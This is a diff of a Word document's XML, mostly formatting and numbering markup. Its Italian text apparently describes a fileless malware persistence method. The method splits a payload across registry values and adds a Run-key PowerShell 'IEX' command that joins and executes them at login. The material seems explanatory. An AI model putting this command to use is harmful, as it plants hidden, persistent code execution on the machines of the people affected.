+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>In HKCU\Software\Classes\Local\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>AppData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viene salvata la seconda metà</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nella chiave Run</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di un software X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viene inserito il comando: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "IEX (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>gp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'HKCU:\...\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Telemetry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>').ID + (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>gp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'HKCU:\...\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>AppData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>).Value</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
@@ -1666,6 +2731,7 @@
                 <w:rPr>
                   <w:sz w:val="26"/>
                   <w:szCs w:val="26"/>
+                  <w:u w:val="single"/>
                 </w:rPr>
               </w:pPr>
               <w:r>
@@ -1692,6 +2758,56 @@
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
@@ -2231,6 +3347,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2964194A"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="D7021A94"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3762685E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5456D60E"/>
@@ -2379,7 +3608,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="397F064C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="94BC9012"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3E2C586D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="445E341A"/>
@@ -2496,7 +3874,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="41495812"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F1F24FBE"/>
@@ -2645,7 +4023,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="47F0156F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1390FD74"/>
@@ -2758,7 +4136,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48147DBA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="59F8FA30"/>
@@ -2907,7 +4285,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48826219"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="23F60560"/>
@@ -3056,7 +4434,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4BCA3A0D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BA143F50"/>
@@ -3145,7 +4523,156 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="50131C7B"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="8C5289DC"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
